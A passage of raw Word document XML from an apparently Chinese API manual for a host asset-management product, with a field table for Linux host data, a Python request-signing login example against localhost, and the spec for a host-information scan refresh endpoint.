          <w:p w14:paraId="6517CE0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D484161" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="380107B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bash版本，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5531ADBC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EA6916C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bashPluginInstalled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0725D0AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50C33AD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CB41FB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bash是否安装 true-安装 false-未安装 仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3D9029F8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DE2E1AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>systemLoad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33F8CEFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B29A6A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37EA962E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统负载0 – 未知 1 – 低2 – 中 3 – 高</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1A20BEBF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EA6DEF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>offlineDays</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42C49BB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B95E012" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint (20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FC1D54E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>不在线天数=当前时间-lastOnlineTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4B3FBE25" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75425BB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostLocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DC5230C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EDE333D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D6087A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>机房位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="53264AA7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="676E740C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>chargeName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1366CBB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69A1559C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D5E3BBA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>负责人</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="18D4BE3D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F0ABAB6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>memories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59A9D459" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63443A77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type：varchar(512) producer：varchar(512) size：int(10) speed：tinyint(4) description：varchar(1024) producerSize:bigint(20) bank:varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B83C2CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>硬件配置信息 type：生产商 producer：生产厂商 size：单条内存大小,(系统实际大小)单位MB speed：内存主频率，单位MHz description：描述 producerSize:出厂内存条大小 bank：内存条信</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4DC6C68E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3492F17E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>manufacturer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0447459F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D4685E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="558AED84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>生产商</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3734FF40" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DBC1B1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>productName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14690619" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C1BA967" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C3E905C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>设备型号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7D1B144A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07310E66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>serialNumber</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="000211DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A73DE3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A21C8A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>序列号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1231C1AC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12E65D7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>networkCards</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A9D289A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A2B6B84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name：varchar(512) mac：varchar(512) ipv4：varchar(15) ipv6：varchar(32) gateway：varchar(1024) dnsServer：varchar(512) netmask：varchar(15) broadcast：varchar(15) status：varchar(2) speed：long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EC8A369" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>网卡信息 name：网卡名 mac：mac地址 ipv4：ipv4网卡地址 ipv6：ipv6网卡地址 gateway：网关 dnsServer：dnsserver netmask：子网掩码 broadcast：广播地址 status：网卡状态，空字符串：未知，"1"：已连接，"0"：未连接 speed：网卡速度，单位：Mb/s，0表示未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19DFA4C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0153E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /usr/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>from __future__ import absolute_import</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import httplib</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import json</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import hashlib</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 登录请求调用示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/v1/api/auth" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/json"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    body = {"username": "dev@xx.com", "password": "abc@123"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    json_body = json.dumps(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn.request(method="POST", url=url, body=json_body, headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = response.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return json.loads(res)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 发送请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def send_request(method, url, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 参看登录认证里面的登录方法代码示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    login_result = login()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign_key = login_result.get("data").get("signKey")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    jwt = login_result.get("data").get("jwt")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    comid = login_result.get("data").get("comId")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">    # 当前时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ts = int(time.time())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if data is not None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        info = ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        if method == "GET":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            # 对参数key进行字典排序</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            keys = sorted(data.keys())</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            for key in keys:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                info = info + key + str(data.get(key))</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                print info</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        elif method == "POST" or method == "PUT" or method == "DELETE":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            info = json.dumps(data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        to_sign = comid + info + str(ts) + sign_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        to_sign = comid + str(ts) + sign_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print to_sign</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 对待签名字符串进行sha1得到签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign = hashlib.sha1(to_sign).hexdigest()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # 组装http请求头参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/json", "comId": comid, "timestamp": ts,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              "sign": sign, "Authorization": "Bearer " + jwt}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn.request(method=method, url=url, body=json.dumps(data), headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = response.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def host_linux():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/host/linux?agentId=9d64f73542a1c78f&amp;hostname=slave&amp;ip=192.168.78.131&amp;agentStatus=1" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'agentId': '9d64f73542a1c78f', 'hostname': 'slave', 'ip': '192.168.78.131', 'agentStatus': 1}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    host_linux()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFBCDE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="主机信息扫描"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:t>主机信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591703B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求主机信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F6536D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEB7589" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>POST /external/api/assets/host/{win|linux}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A08C2B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D21C370" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23536FF0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FA1245" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/host/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9BB0DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DCF949" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595427AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8326F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7A82A9"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7013101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CF35852" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E903433" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D2F96BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25B6C793" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
